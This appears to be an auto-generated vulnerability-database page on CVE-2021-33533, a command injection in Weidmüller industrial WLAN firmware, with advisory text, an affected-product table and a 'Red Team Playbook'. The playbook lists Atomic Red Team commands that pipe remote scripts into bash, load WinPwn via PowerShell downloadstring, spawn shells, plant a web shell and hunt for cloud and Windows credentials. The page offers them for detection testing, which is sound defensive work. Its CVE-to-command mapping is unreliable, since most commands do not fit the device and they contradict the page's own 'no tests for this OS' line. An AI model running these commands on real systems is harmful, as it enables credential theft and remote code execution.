CVE-2021-33533
Overview
This vulnerability is a command injection flaw originating from improper input validation within the iw_webs functionality of Weidmüller Industrial WLAN devices. Specifically, the iw_serverip parameter is not sanitized before being used in a subsequent system call (iw_system), allowing user-supplied input to be executed as commands. The affected component is the embedded web interface handling network configuration parameters on multiple firmware versions of the IE-WL series devices.
Vulnerability Description
In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the iw_webs functionality. A specially crafted iw_serverip parameter can cause user input to be reflected in a subsequent iw_system call, resulting in remote control over the device. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.
Impact
An attacker with low-privilege authenticated access can execute arbitrary commands remotely on the affected device, potentially gaining full control over device functions and network traffic. This can lead to unauthorized configuration changes, data exfiltration, or disruption of industrial network operations. The vulnerability requires network access and valid credentials (CVSS vector PR:L), but no user interaction, making exploitation feasible in environments where low-privileged user accounts exist.
Solution
Weidmüller has published an advisory (VDE-2021-026) addressing this vulnerability with firmware updates for affected IE-WL series devices. Users should apply the latest firmware versions as specified in the advisory to remediate the command injection flaw. Detailed patch instructions and version information are available at https://cert.vde.com/en-us/advisories/vde-2021-026. No alternative mitigations or workarounds are documented by the vendor.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A significant command injection vulnerability exists in specific Weidmueller Industrial WLAN devices, which can be exploited through the iw_webs functionality. This flaw arises when the iw_serverip parameter is manipulated, allowing an attacker to inject arbitrary commands that are executed in the context of the device's iw_system call. The vulnerability is particularly concerning because it can be triggered by an authenticated user with low privileges, meaning that an attacker does not need to possess high-level access to exploit the flaw. This situation creates a pathway for unauthorized control over the device, potentially leading to further compromise of the network infrastructure.
The attack vector for this vulnerability is relatively straightforward. An attacker, once authenticated, can craft a malicious request that includes a specially designed iw_serverip parameter. Upon processing this request, the device reflects the input in a subsequent system call, executing the attacker's commands. This exploitation can occur over the network, making it accessible to attackers who have gained minimal access to the system. Scenarios could include an insider threat where a low-privileged user with malicious intent exploits this vulnerability, or an external attacker who has managed to authenticate through other means, such as credential theft or social engineering.
The real-world implications of this vulnerability are significant. Given the critical role that industrial WLAN devices play in operational technology environments, successful exploitation could lead to unauthorized access to sensitive systems, disruption of services, or even physical damage to equipment. The potential for an attacker to execute commands remotely raises the stakes, as they could manipulate device configurations, intercept communications, or launch further attacks within the network. The business risks associated with such a breach include financial losses, reputational damage, regulatory penalties, and the costs associated with incident response and recovery efforts.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating firmware and applying security patches provided by Weidmueller is essential to close known vulnerabilities. Network segmentation can also help limit the exposure of critical devices to potential attackers. Additionally, monitoring network traffic for unusual patterns or unauthorized command execution attempts can aid in early detection of exploitation attempts. Employing intrusion detection systems (IDS) and conducting regular security audits can further bolster defenses against such vulnerabilities. Educating users about secure practices and the importance of strong authentication can also reduce the risk of exploitation.
In conclusion, the command injection vulnerability in Weidmueller Industrial WLAN devices poses a serious threat to the integrity and security of industrial networks. The ability for low-privileged users to execute arbitrary commands can lead to severe consequences, making it imperative for organizations to prioritize detection and mitigation strategies. By adopting a proactive security posture and maintaining vigilance against potential exploitation, businesses can better protect their critical infrastructure from the risks associated with this vulnerability.
Affected Products (16)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Weidmueller | Ie-Wl-Bl-Ap-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-bl-ap-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Bl-Ap-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-bl-ap-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Bl-Ap-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-bl-ap-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Bl-Ap-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-bl-ap-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Vl-Ap-Br-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-vl-ap-br-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Vl-Ap-Br-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-vl-ap-br-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Vl-Ap-Br-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-vl-ap-br-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Vl-Ap-Br-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-vl-ap-br-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Bl-Ap-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-bl-ap-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Bl-Ap-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-bl-ap-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Bl-Ap-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-bl-ap-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Bl-Ap-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-bl-ap-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Vl-Ap-Br-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-vl-ap-br-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Vl-Ap-Br-Cl-Eu Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-vl-ap-br-cl-eu_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wl-Vl-Ap-Br-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wl-vl-ap-br-cl-us_firmware:*:*:*:*:*:*:*:*
|
|
|
Weidmueller | Ie-Wlt-Vl-Ap-Br-Cl-Us Firmware | All |
cpe:2.3:o:weidmueller:ie-wlt-vl-ap-br-cl-us_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
47%
|
High | High | |
| CAPEC-6 | Argument Injection |
46%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
43%
|
Medium | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-33533 |
| cert.vde.com |
GitHub CVE
x_refsource_CONFIRM
|
https://cert.vde.com/en-us/advisories/vde-2021-026 |